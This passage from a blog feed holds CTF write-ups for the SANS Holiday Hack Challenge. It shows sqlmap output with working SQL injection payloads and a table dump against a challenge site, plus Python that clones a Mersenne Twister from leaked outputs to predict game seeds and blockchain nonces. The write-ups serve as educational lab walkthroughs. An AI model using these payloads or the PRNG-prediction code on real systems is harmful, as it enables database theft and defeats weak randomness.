&lt;/span>&lt;span class="s1">[10:40:06] [INFO] testing connection to the target URL
&lt;/span>&lt;span class="s1">[10:40:09] [INFO] target URL content is stable
&lt;/span>&lt;span class="s1">[10:40:10] [INFO] heuristic (basic) test shows that GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; might be injectable (possible DBMS: &amp;#39;&lt;/span>MySQL&lt;span class="s1">&amp;#39;)
&lt;/span>&lt;span class="s1">[10:40:11] [INFO] heuristic (XSS) test shows that GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; might be vulnerable to cross-site scripting (XSS) attacks
&lt;/span>&lt;span class="s1">[10:40:11] [INFO] testing for SQL injection on GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39;
&lt;/span>&lt;span class="s1">it looks like the back-end DBMS is &amp;#39;&lt;/span>MySQL&lt;span class="s1">&amp;#39;. Do you want to skip test payloads specific for other DBMSes? [Y/n]
&lt;/span>&lt;span class="s1">for the remaining tests, do you want to include all tests for &amp;#39;&lt;/span>MySQL&lt;span class="s1">&amp;#39; extending provided level (1) value? [Y/n]
&lt;/span>&lt;span class="s1">[10:40:25] [INFO] testing &amp;#39;&lt;/span>AND boolean-based blind - WHERE or HAVING clause&lt;span class="s1">&amp;#39;
&lt;/span>&lt;span class="s1">[10:40:31] [INFO] GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; appears to be &amp;#39;&lt;/span>AND boolean-based blind - WHERE or HAVING clause&lt;span class="s1">&amp;#39; injectable (with --string=&amp;#34;Your application is still pending!&amp;#34;)
&lt;/span>&lt;span class="s1">[...REDACTED FOR BREVITY...]
&lt;/span>&lt;span class="s1">[10:46:19] [INFO] testing &amp;#39;&lt;/span>MySQL UNION query &lt;span class="o">(&lt;/span>random number&lt;span class="o">)&lt;/span> - &lt;span class="m">81&lt;/span> to &lt;span class="m">100&lt;/span> columns&lt;span class="s1">&amp;#39;
&lt;/span>&lt;span class="s1">GET parameter &amp;#39;&lt;/span>elfmail&lt;span class="s1">&amp;#39; is vulnerable. Do you want to keep testing the others (if any)? [y/N]
&lt;/span>&lt;span class="s1">sqlmap identified the following injection point(s) with a total of 279 HTTP(s) requests:
&lt;/span>&lt;span class="s1">---
&lt;/span>&lt;span class="s1">Parameter: elfmail (GET)
&lt;/span>&lt;span class="s1"> Type: boolean-based blind
&lt;/span>&lt;span class="s1"> Title: AND boolean-based blind - WHERE or HAVING clause
&lt;/span>&lt;span class="s1"> Payload: elfmail=asd&amp;#39;&lt;/span> AND &lt;span class="nv">7313&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">7313&lt;/span> AND &lt;span class="s1">&amp;#39;PMOS&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;PMOS
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1"> Type: error-based
&lt;/span>&lt;span class="s1"> Title: MySQL &amp;gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
&lt;/span>&lt;span class="s1"> Payload: elfmail=asd&amp;#39;&lt;/span> AND &lt;span class="o">(&lt;/span>SELECT &lt;span class="m">1941&lt;/span> FROM&lt;span class="o">(&lt;/span>SELECT COUNT&lt;span class="o">(&lt;/span>*&lt;span class="o">)&lt;/span>,CONCAT&lt;span class="o">(&lt;/span>0x716b626b71,&lt;span class="o">(&lt;/span>SELECT &lt;span class="o">(&lt;/span>ELT&lt;span class="o">(&lt;/span>&lt;span class="nv">1941&lt;/span>&lt;span class="o">=&lt;/span>1941,1&lt;span class="o">)))&lt;/span>,0x7171626a71,FLOOR&lt;span class="o">(&lt;/span>RAND&lt;span class="o">(&lt;/span>0&lt;span class="o">)&lt;/span>*2&lt;span class="o">))&lt;/span>x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x&lt;span class="o">)&lt;/span>a&lt;span class="o">)&lt;/span> AND &lt;span class="s1">&amp;#39;EUey&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;EUey
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1"> Type: time-based blind
&lt;/span>&lt;span class="s1"> Title: MySQL &amp;gt;= 5.0.12 AND time-based blind (query SLEEP)
&lt;/span>&lt;span class="s1"> Payload: elfmail=asd&amp;#39;&lt;/span> AND &lt;span class="o">(&lt;/span>SELECT &lt;span class="m">1748&lt;/span> FROM &lt;span class="o">(&lt;/span>SELECT&lt;span class="o">(&lt;/span>SLEEP&lt;span class="o">(&lt;/span>5&lt;span class="o">)))&lt;/span>MzkM&lt;span class="o">)&lt;/span> AND &lt;span class="s1">&amp;#39;qFnu&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="err">&amp;#39;&lt;/span>qFnu
---
&lt;span class="o">[&lt;/span>10:59:36&lt;span class="o">]&lt;/span> &lt;span class="o">[&lt;/span>INFO&lt;span class="o">]&lt;/span> the back-end DBMS is MySQL
web application technology: PHP 7.2.1, Nginx 1.14.2
back-end DBMS: MySQL &amp;gt;&lt;span class="o">=&lt;/span> 5.0
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now you can see that &lt;strong>sqlmap&lt;/strong>, in cooperation with &lt;strong>mitmproxy&lt;/strong>, successfully identified the DBMS and found three vulnerabilities in the &lt;strong>elfmail&lt;/strong> input field:&lt;/p>
&lt;ul>
&lt;li>boolean-based blind&lt;/li>
&lt;li>error-based&lt;/li>
&lt;li>time-based blind&lt;/li>
&lt;/ul>
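&lt;p>Under the hood, the boolean-based blind technique asks the server yes/no questions: a true condition leaves the marker text &lt;code>Your application is still pending!&lt;/code> on the page, while a false one removes it. Below is a minimal, hypothetical sketch of the probe URLs sqlmap constructs; &lt;code>TARGET&lt;/code> is a placeholder, since the real URL is redacted above:&lt;/p>

```python
# Hypothetical sketch of sqlmap's boolean-based blind probing.
# TARGET is a placeholder; the real vulnerable URL is redacted above.
TARGET = "https://TARGET/check.php"

def blind_probe_url(value, condition):
    # A true condition keeps the marker text on the page, a false one
    # drops it, which is what sqlmap's --string option compares against.
    payload = f"{value}' AND {condition} AND 'PMOS'='PMOS"
    return f"{TARGET}?elfmail={payload}"

true_probe = blind_probe_url("asd", "7313=7313")
false_probe = blind_probe_url("asd", "7313=7314")
```

&lt;p>A real request would also URL-encode the payload; sqlmap handles that automatically.&lt;/p>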
&lt;p>Next you can use sqlmap to explore the database further. Passing the flag &lt;strong>&amp;ndash;dbs&lt;/strong> to the same command as before lists all databases, while the flag &lt;strong>&amp;ndash;tables&lt;/strong> lists all the tables within a chosen database. Once you find the right database and table, the flag &lt;strong>&amp;ndash;dump&lt;/strong> dumps the table&amp;rsquo;s contents. In this case these flags worked to find the paper scraps:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/sqlmap ▶ python3 sqlmap.py --proxy&lt;span class="o">=[&lt;/span>...&lt;span class="o">]&lt;/span> --url&lt;span class="o">=[&lt;/span>...&lt;span class="o">]&lt;/span> -p elfmail -D elfu -T krampus --dump
database: elfu
Table: krampus
&lt;span class="o">[&lt;/span>&lt;span class="m">6&lt;/span> entries&lt;span class="o">]&lt;/span>
+----+-----------------------+
&lt;span class="p">|&lt;/span> id &lt;span class="p">|&lt;/span> path &lt;span class="p">|&lt;/span>
+----+-----------------------+
&lt;span class="p">|&lt;/span> &lt;span class="m">1&lt;/span> &lt;span class="p">|&lt;/span> /krampus/0f5f510e.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">2&lt;/span> &lt;span class="p">|&lt;/span> /krampus/1cc7e121.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">3&lt;/span> &lt;span class="p">|&lt;/span> /krampus/439f15e6.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">4&lt;/span> &lt;span class="p">|&lt;/span> /krampus/667d6896.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">5&lt;/span> &lt;span class="p">|&lt;/span> /krampus/adb798ca.png &lt;span class="p">|&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="m">6&lt;/span> &lt;span class="p">|&lt;/span> /krampus/ba417715.png &lt;span class="p">|&lt;/span>
+----+-----------------------+
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Prefixing the file names from the exfiltrated table with the site&amp;rsquo;s URL finally reveals the paper scraps. Once you download and reassemble all of them, you can read the full text of the letter and answer the objective.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">wget https://studentportal.elfu.org/krampus/0f5f510e.png
wget https://studentportal.elfu.org/krampus/1cc7e121.png
wget https://studentportal.elfu.org/krampus/439f15e6.png
wget https://studentportal.elfu.org/krampus/667d6896.png
wget https://studentportal.elfu.org/krampus/adb798ca.png
wget https://studentportal.elfu.org/krampus/ba417715.png
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;strong>What is the name of Santa&amp;rsquo;s cutting-edge sleigh guidance system?&lt;/strong>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Super Sled-o-matic
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Blockchain Investigation Part 1</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11a/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11a/</guid><description>&lt;p>&lt;img src="../images/obj11a/objective11a.png" alt="Objective11a">&lt;/p>
&lt;p>At first glance, this seems like a tough one, so I go to talk with &lt;code>Tangle Coalbox&lt;/code> in the &lt;strong>Speaker Unpreparedness Room&lt;/strong> to get some help.&lt;/p>
&lt;p>First though, he needs my help with his SnowBall Game terminal. He says that people were solving it on &lt;strong>IMPOSSIBLE&lt;/strong> level, which should really be impossible:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/tangle-coalbox.png" alt="Tangle Coalbox">&lt;/p>
&lt;blockquote>
&lt;p>Howdy Boss. You look a tad flushed.
Can I get you some water from the vending machine?
I&amp;rsquo;m still looking into the Snowball Game like you asked.
I read the write-up of the test completed earlier this summer with the web socket vulnerabilities.
I was able to complete the Easy level, but the Impossible level is, umm&amp;hellip;
I&amp;rsquo;d call it impossible, but I just saw someone beat it!
Is it possible that the name a player provides influences how the forts are laid out?
Oh, oh, maybe if I feed a Hard name into an Easy game I can manipulate it!
UGH! on Impossible, the best I get are rejected player names in the page comments&amp;hellip; maybe that&amp;rsquo;s useful?
I&amp;rsquo;ll have to re-watch Tom Liston&amp;rsquo;s talk again (
&lt;a href="https://www.youtube.com/watch?v=Jo5Nlbqd-Vg" target="_blank" rel="noopener">LINK&lt;/a>).
Thanks for all the tips and encouragement Santa!&lt;/p>
&lt;/blockquote>
&lt;p>It seems I am tasked with solving
&lt;a href="https://snowball2.kringlecastle.com" target="_blank" rel="noopener">the game&lt;/a> on &lt;strong>IMPOSSIBLE&lt;/strong> difficulty to see how the others have done it. Following Tangle&amp;rsquo;s advice, I watch the KringleCon
&lt;a href="https://www.youtube.com/watch?v=Jo5Nlbqd-Vg" target="_blank" rel="noopener">talk&lt;/a> by Tom Liston on PRNGs that offers essential information. To get started, I click on the machine which pops up the below welcome screen. I make sure to read the instructions very carefully, at least twice:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/snowball-welcome.png" alt="SnowBall Game Welcome">&lt;/p>
&lt;p>Levels &lt;strong>Easy &amp;amp; Medium&lt;/strong> are indeed quite simple to solve without any trickery. It gets interesting once I start playing with the input box for my &lt;strong>Name&lt;/strong>: this value is used as a seed for a random generator that creates the board. The same value always results in the same board setup.&lt;/p>
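&lt;p>The seeding behaviour is easy to illustrate in Python, whose &lt;code>random&lt;/code> module happens to be a Mersenne Twister as well. This is purely illustrative and not the game&amp;rsquo;s actual code:&lt;/p>

```python
import random

def board_for(name, size=10, forts=5):
    # Seeding the PRNG with the player's name makes the layout
    # deterministic: the same name always yields the same fort positions.
    rng = random.Random(name)
    cells = [(row, col) for row in range(size) for col in range(size)]
    return rng.sample(cells, forts)

# The same seed reproduces the same board every time.
assert board_for("Jingle") == board_for("Jingle")
```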
&lt;p>On &lt;strong>IMPOSSIBLE&lt;/strong> difficulty this value is &lt;strong>redacted&lt;/strong>, but I think there is a way to predict it using the script from Tom Liston&amp;rsquo;s talk. To recover the redacted value I need a certain number of generated random values, so that I can clone the internal state of the &lt;strong>Mersenne Twister&lt;/strong> that&amp;rsquo;s used as the generator. Quite unexpectedly, there is a dump of discarded random values in the game&amp;rsquo;s page source:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/impossible-source.png" alt="Impossible HTML Commented Source">&lt;/p>
&lt;p>Next I formulate the below plan to solve it on &lt;strong>IMPOSSIBLE&lt;/strong> difficulty:&lt;/p>
&lt;ol>
&lt;li>Start a new game on &lt;strong>IMPOSSIBLE&lt;/strong> difficulty&lt;/li>
&lt;li>Grab discarded random values from the HTML source&lt;/li>
&lt;li>Feed these values to a modified version of
&lt;a href="https://github.com/tliston/mt19937" target="_blank" rel="noopener">Tim&amp;rsquo;s scipt&lt;/a> to predict next value&lt;/li>
&lt;li>Start a new game on &lt;strong>EASY&lt;/strong> mode with the predicted number from step #3&lt;/li>
&lt;li>Verify that both open games have identical setup by comparing your side of the table&lt;/li>
&lt;li>Solve game on Easy mode manually, then replay it on the other game hitting only known cells&lt;/li>
&lt;li>Collect hints from &lt;code>Tangle&lt;/code>&lt;/li>
&lt;/ol>
&lt;p>The code I wrote is based on
&lt;a href="https://github.com/tliston/mt19937" target="_blank" rel="noopener">Tim&amp;rsquo;s python code&lt;/a>, with the &lt;code>main&lt;/code> changed to:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln">1&lt;/span>&lt;span class="k">if&lt;/span> &lt;span class="vm">__name__&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s2">&amp;#34;__main__&amp;#34;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">2&lt;/span> &lt;span class="n">my_random&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">mt19937&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">3&lt;/span> &lt;span class="k">with&lt;/span> &lt;span class="nb">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;random.txt&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="k">as&lt;/span> &lt;span class="n">fp&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="ln">4&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="ln">5&lt;/span> &lt;span class="k">for&lt;/span> &lt;span class="n">line&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">fp&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">readlines&lt;/span>&lt;span class="p">():&lt;/span>
&lt;span class="hl">&lt;span class="ln">6&lt;/span> &lt;span class="n">my_random&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">MT&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">untemper&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">int&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">line&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/span>&lt;span class="ln">7&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="o">+=&lt;/span>&lt;span class="mi">1&lt;/span>
&lt;span class="ln">8&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Next int: {my_random.extract_number()}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>First it creates a new instance of the &lt;strong>Mersenne Twister&lt;/strong>, then loads the discarded random values from a file called &lt;code>random.txt&lt;/code> and uses them to clone the internal state of the generator used to create the game board. Finally, it generates the next random number which is used to start a new game on &lt;strong>EASY&lt;/strong> level so that I can figure out the cells I need to hit on &lt;strong>IMPOSSIBLE&lt;/strong>:&lt;/p>
&lt;p>&lt;img src="../images/obj11a/win-impossible.png" alt="Win Impossible">&lt;/p>
&lt;p>Finally, &lt;code>Tangle&lt;/code> is ready to share his hints:&lt;/p>
&lt;blockquote>
&lt;p>Wow, it really was all about abusing the pseudo-random sequence!
I&amp;rsquo;ve been thinking, do you think someone could try and cheat the Naughty/Nice Blockchain with this same technique?
I remember you told us about how if you have control over two bytes in a file, it&amp;rsquo;s easy to create MD5 hash collisions.
But the nonce would have to be known ahead of time.
We know that the blockchain works by &amp;ldquo;chaining&amp;rdquo; blocks together.
There&amp;rsquo;s no way you-know-who could change it without messing up the chain, right Santa?
I&amp;rsquo;m going to look closer to spot if any of the blocks have been changed.
If Jack was able to change the block AND the document without changing the hash&amp;hellip; that would require a very UNIque hash COLLision.
Apparently Jack was able to change just 4 bytes in the block to completely change everything about it. It&amp;rsquo;s like some sort of evil game to him.
I think I need to review my Human Behavior Naughty/Niceness curriculum again.&lt;/p>
&lt;/blockquote>
&lt;p>I also get some useful links from him:&lt;/p>
&lt;ul>
&lt;li>GitHub repo about
&lt;a href="https://github.com/corkami/collisions" target="_blank" rel="noopener">MD5 Hash Collisions&lt;/a>&lt;/li>
&lt;li>GitHub repo about
&lt;a href="https://github.com/cr-marcstevens/hashclash" target="_blank" rel="noopener">MD5 &amp;amp; SHA-1 cryptanalysis&lt;/a>&lt;/li>
&lt;li>Presentation on
&lt;a href="https://speakerdeck.com/ange/colltris" target="_blank" rel="noopener">Hash Collisions Exploitations&lt;/a>&lt;/li>
&lt;li>KringleCon Talk from Prof. Qwerty Petabyte on
&lt;a href="https://www.youtube.com/watch?v=7rLMl88p-ec" target="_blank" rel="noopener">Working with the Official Naughty/Nice Blockchain&amp;hellip;&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>For some extra hints I stop by Santa&amp;rsquo;s office to talk with &lt;code>Tinsel Upatree&lt;/code>:&lt;/p>
&lt;blockquote>
&lt;p>Howdy Santa! Just guarding the Naughty/Nice list on your desk.
Santa, I don&amp;rsquo;t know if you&amp;rsquo;ve heard, but something is very, very wrong&amp;hellip;
We tabulated the latest score of the Naughty/Nice Blockchain.
Jack Frost is the nicest being in the world! Jack Frost!?!
As you know, we only really start checking the Naughty/Nice totals as we get closer to the holidays.
Out of nowhere, Jack Frost has this crazy score&amp;hellip; positive 4,294,935,958 nice points!
No one has EVER gotten a score that high! No one knows how it happened.
Most of us recall Jack having a NEGATIVE score only a few days ago&amp;hellip;
Worse still, his huge positive score seems to have happened way back in March.
Our first thought was that he somehow changed the blockchain - but, as you know, that isn&amp;rsquo;t possible.
We ran a validation of the blockchain and it all checks out.
Even the smallest change to any block should make it invalid.
Blockchains are huge, so we cut a one minute chunk from when Jack&amp;rsquo;s big score registered back in March.
You can get a slice of the Naughty/Nice blockchain on your desk.
You can get some tools to help you here.
Tangle Coalbox, in the Speaker UNPreparedness room, has been talking with attendees about the issue.&lt;/p>
&lt;/blockquote>
&lt;p>Next I download the
&lt;a href="https://download.holidayhackchallenge.com/2020/OfficialNaughtyNiceBlockchainEducationPack.zip" target="_blank" rel="noopener">tools&lt;/a> mentioned by &lt;code>Tinsel&lt;/code> as well as the blockchain
&lt;a href="https://download.holidayhackchallenge.com/2020/blockchain.dat" target="_blank" rel="noopener">file&lt;/a> which is necessary for solving the main objective.&lt;/p>
&lt;p>&lt;img src="../images/obj11a/blockchain-zip.png" alt="Blockchain and Files in ZIP">&lt;/p>
&lt;p>The two &lt;code>pem&lt;/code> files are not so important for Objective11a. The bash script and the Dockerfile are there just for easy setup of an environment where the python script runs without dependency issues. With the provided python script I can interact with the &lt;code>blockchain.dat&lt;/code> file and extract all the information needed for solving the objective.&lt;/p>
&lt;p>The instructions tell me that the blockchain stops at index 129996, and my task is to predict the nonce for block &lt;code>130000&lt;/code> and submit its &lt;strong>HEX&lt;/strong> value in the badge. This naturally reminds me of the &lt;strong>SnowBall Game&lt;/strong>, so I figure that the same script may be useful here too. I proceed to extract the &lt;code>nonce&lt;/code> values from all the blocks and notice that there are roughly 1500 blocks altogether, plenty more than the 624 outputs needed to clone a Mersenne Twister&amp;rsquo;s state, so that&amp;rsquo;s good! Meanwhile, I also notice that these &lt;code>nonce&lt;/code> values are much larger than the random values I dealt with in the &lt;strong>SnowBall Game&lt;/strong>. In fact, that game used &lt;code>32 bit&lt;/code> random integers, while this blockchain uses &lt;code>64 bit&lt;/code> integers as nonces.&lt;/p>
&lt;p>Next I try to modify Tom Liston&amp;rsquo;s script to produce 64 bit random values instead of 32 bit ones. I eventually succeed, following an
&lt;a href="http://www.cplusplus.com/reference/random/mt19937_64/" target="_blank" rel="noopener">example&lt;/a>. However, the &lt;code>nonce&lt;/code> it generates is not accepted. Next I get in touch with some fellow KringleCon attendees via Discord to discuss my approach and see whether I am in a rabbit hole.&lt;/p>
&lt;p>Eventually I realize that the script does not need to be modified, as the system that created the blockchain also used a PRNG that produces 32 bit random values. Rather, the &lt;code>nonce&lt;/code> value in each block is constructed from two independent random values. Part of the challenge is to figure out how they are combined into a single 64 bit value.&lt;/p>
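&lt;p>The arithmetic works out neatly: MT19937 keeps 624 32-bit words of internal state, and each 64 bit &lt;code>nonce&lt;/code> contributes two 32 bit outputs, so 312 blocks are enough to clone the generator. A small sketch of the splitting, under the assumption (confirmed by trial and error for this blockchain) that the low word was drawn first:&lt;/p>

```python
MT_STATE_WORDS = 624                 # MT19937 state size in 32-bit words
BLOCKS_NEEDED = MT_STATE_WORDS // 2  # two 32-bit outputs per 64-bit nonce

def split_nonce(nonce):
    # Assumption: the generator emitted the low 32 bits first.
    return nonce & 0xFFFFFFFF, nonce >> 32

def combine(low, high):
    # Recombine two 32-bit PRNG outputs into one 64-bit nonce.
    return (high << 32) | low
```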
&lt;p>Next I tweak the &lt;code>naughty_nice.py&lt;/code> script to take the first 312 &lt;code>nonce&lt;/code> values and feed them into Tom Liston&amp;rsquo;s script by splitting each &lt;code>nonce&lt;/code> in half. By trial and error I figure out the correct method, implemented below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln"> 1&lt;/span>&lt;span class="n">c2&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">Chain&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">True&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">filename&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;blockchain.dat&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln"> 2&lt;/span>
&lt;span class="ln"> 3&lt;/span>&lt;span class="n">twister&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">mt19937&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">),&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="ln"> 4&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">block&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">c2&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[:&lt;/span>&lt;span class="mi">312&lt;/span>&lt;span class="p">]:&lt;/span>
&lt;span class="hl">&lt;span class="ln"> 5&lt;/span> &lt;span class="n">twister&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">MT&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">untemper&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">block&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">nonce&lt;/span> &lt;span class="o">&amp;amp;&lt;/span> &lt;span class="mh">0x00000000FFFFFFFF&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="o">+=&lt;/span>&lt;span class="mi">1&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln"> 6&lt;/span> &lt;span class="n">twister&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">MT&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">untemper&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">block&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">nonce&lt;/span> &lt;span class="o">&amp;gt;&amp;gt;&lt;/span> &lt;span class="mi">32&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="o">+=&lt;/span>&lt;span class="mi">1&lt;/span>
&lt;/span>&lt;span class="ln"> 7&lt;/span>
&lt;span class="ln"> 8&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">block&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">c2&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">312&lt;/span>&lt;span class="p">:]:&lt;/span>
&lt;span class="ln"> 9&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s2">Real nonce: &lt;/span>&lt;span class="se">\t&lt;/span>&lt;span class="s2">{block.nonce} at index {block.index}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">10&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Predicted: &lt;/span>&lt;span class="se">\t&lt;/span>&lt;span class="s2">{get_next(twister)}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">11&lt;/span>
&lt;span class="hl">&lt;span class="ln">12&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">4&lt;/span>&lt;span class="p">):&lt;/span>
&lt;/span>&lt;span class="ln">13&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Hex-#{i+129997}: &lt;/span>&lt;span class="se">\t&lt;/span>&lt;span class="s2">{hex(get_next(twister))}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The output shows that starting from block 313, all of the &lt;code>nonce&lt;/code> values from the blocks are identical to the values produced by the cloned generator I created. Finally, I take the hex value for block &lt;code>130000&lt;/code> and submit it in my badge, where it is accepted:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>...
&lt;span class="ln"> 2&lt;/span>Real nonce: &lt;span class="m">7556872674124112955&lt;/span> at index &lt;span class="m">129995&lt;/span>
&lt;span class="ln"> 3&lt;/span>Predicted: &lt;span class="m">7556872674124112955&lt;/span>
&lt;span class="ln"> 4&lt;/span>Real nonce: &lt;span class="m">16969683986178983974&lt;/span> at index &lt;span class="m">129996&lt;/span>
&lt;span class="ln"> 5&lt;/span>Predicted: &lt;span class="m">16969683986178983974&lt;/span>
&lt;span class="ln"> 6&lt;/span>
&lt;span class="ln"> 7&lt;/span>Hex-#129997: 0xb744baba65ed6fce
&lt;span class="ln"> 8&lt;/span>Hex-#129998: 0x1866abd00f13aed
&lt;span class="ln"> 9&lt;/span>Hex-#129999: 0x844f6b07bd9403e4
&lt;span class="hl">&lt;span class="ln">10&lt;/span>Hex-#130000: 0x57066318f32f729d
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>On to the final objective! 😎&lt;/p></description></item><item><title>Recover Cleartext Document</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective10/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective10/</guid><description>&lt;h2 id="hidden-in-the-mongo">Hidden in the Mongo&lt;/h2>
&lt;p>Instructions in your personal badge:&lt;/p>
&lt;blockquote>
&lt;p>The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can&amp;rsquo;t send you the source, but we do have debug symbols that you can use.
Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.
What is the middle line on the cover page? (Hint: it&amp;rsquo;s five words)
For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.&lt;/p>
&lt;/blockquote>
&lt;p>Links in the objective:&lt;/p>
&lt;ul>
&lt;li>
&lt;a href="https://downloads.elfu.org/elfscrow.exe" target="_blank" rel="noopener">elfscrow.exe&lt;/a>&lt;/li>
&lt;li>
&lt;a href="https://downloads.elfu.org/elfscrow.pdb" target="_blank" rel="noopener">elfscrow.pdb&lt;/a>&lt;/li>
&lt;li>
